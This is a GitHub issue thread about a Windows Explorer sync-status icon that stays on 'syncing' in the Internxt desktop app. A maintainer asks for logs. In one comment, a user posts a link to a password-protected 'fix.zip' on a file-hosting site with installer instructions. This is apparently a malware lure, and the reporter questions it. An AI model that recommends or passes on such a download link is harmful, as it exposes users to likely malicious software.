### ISSUE TITLE
Status in Windows Explorer sometimes is not updated correctly

### ISSUE THREAD

**Issue by claell** [internxt/drive-desktop#510]
![grafik](https://github.com/user-attachments/assets/ea96c04f-818a-48ef-8ada-3a42282735e6)

Everything seems to be successfully synced, but the icon of one folder is still showing "syncing".

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by claell** [comment]
@Anubi5x0 are you sure that you comment on the correct issue? Are you in some way involved with Internxt?

**Comment by fvsegarra** [comment]
Hi there,
Please send us all details on this alongside the log files of the app to hello@internxt.com so that we can finish investigating
Thank you!

**Comment by claell** [comment]
Issue persists in 2.1.3.
